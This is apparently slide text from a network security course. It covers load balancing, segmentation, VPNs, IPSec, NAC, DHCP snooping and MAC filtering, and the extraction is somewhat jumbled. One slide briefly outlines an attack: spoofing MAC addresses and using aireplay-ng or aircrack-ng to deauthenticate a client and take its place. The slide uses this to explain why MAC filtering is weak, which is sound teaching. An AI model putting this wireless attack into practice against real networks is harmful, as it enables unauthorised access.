Professional Documents
Culture Documents
Network Security: Hosted By: Ed-Lab Pakistan and Risk Associates
Network Security: Hosted By: Ed-Lab Pakistan and Risk Associates
Network Security: Hosted By: Ed-Lab Pakistan and Risk Associates
• Active-passive
• Active-active
ROUND ROBIN
Round robin network load balancing rotates connection requests among web servers in the
order that requests are received. For a simplified example, assume that an enterprise has a
cluster of three servers: Server A, Server B, and Server C.
• • The first request is sent to Server A.
• The second request is sent to Server B.
• The third request is sent to Server C
• The load balancer continues passing requests to servers based on this order. This ensures
that the server load is distributed evenly to handle high traffic.
DIFFERENCE BETWEEN WEIGHTED LOAD
BALANCING VS ROUND ROBIN LOAD BALANCING
• The weighted round robin load balancing algorithm allows site administrators to assign weights to each
server based on criteria like traffic-handling capacity. Servers with higher weights receive a higher
proportion of client requests. For a simplified example, assume that an enterprise has a cluster of three
servers:
Server A can handle 15 requests per second, on average
Server B can handle 10 requests per second, on average
Server C can handle 5 requests per second, on average
• Next, assume that the load balancer receives 6 requests.
• 3 requests are sent to Server A
• 2 requests are sent to Server B
• 1 request is sent to Server C.
In this manner, the weighted round robin algorithm distributes the load according to each server’s capacity.
SECURITY / SEGMENTATION MODELS
• Physical
• Logical
• Virtualization
• Air Gapping
PHYSICAL
• By
Implementing
VLANs
systems
could be
logically on
separate
networks
PHYSICAL / LOGICAL
• Castle and moat philosophy where everything behind the firewalls was thought to be safe is
no longer valid
• Internal and external traffic should be monitored and nothing implicitly trusted (internal or
external)
• Micro-segmentation and gritty access providing only the levels of permissions required
1. MFA
2. IAM
3. Orchestration
4. Analytics
5. Encryption
VIRTUAL PRIVATE NETWORK (VPN)
• Security comes from tunneling protocol (i.e. PPTP) and encryption method (i.e. IPSec)
VPN
Many companies provide VPN access to their remote employees to access corporate
resources from offsite location
- Access can be restricted to only certain parts of the corporate network
SPLIT TUNNEL
Split tunnel allows a user to access one set of resources via Firewall/VPN and other
resources directly (i.e. internet websites)
TRANSPORT ENCRYPTION
• IPSec
• - Encapsulating Secure Payload (ESP)
• Provides confidentiality along with optional integrity checking
• Adds a header, trailer and integrity check value (ICV)
NETWORK ACCESS CONTROL (NAC)
• Configure a switch so that it only learns one MAC address per port
• – Keeps attackers from sending multiple fake MAC addresses
• – Can be set to trigger alert
• – MAC address can be hard-coded to a particular port
• Can be used in conjunction with 802.1x to strengthen security at the wall jack
DHCP SNOOPING
DHCP snooping is a layer 2 security technology that monitors for rogue DHCP servers
• Switches can be configured to prevent malicious or malformed DHCP packets
• When a violation is detected, the event should be logged, and alerts generate for further
follow-up/action
MAC FILTERING
• MAC filtering predefines which Media Access Control (MAC) address can connect to the
router or access point.
• This won’t prevent a skilled hacker from spoofing an allowed MAC address
• MAC Addresses are very easy to spoof
• - Tools like Kali Linux and WireShark can allow an attacker to scan a network and discover
valid MAC addresses
• - Use aireplay-ng or aircrack-ng to send a deassociation packets to the client and connect in
its place
• - Can be done manually or even faster via scripts
JUMP SERVER
• Integrity checks protect against tampering by ensuring a file hasn’t been modified
• - Credentials
• - Privileges and Security Settings
• - Content
• - Attributes and size
• - Hash values
• Compares current state against a known good state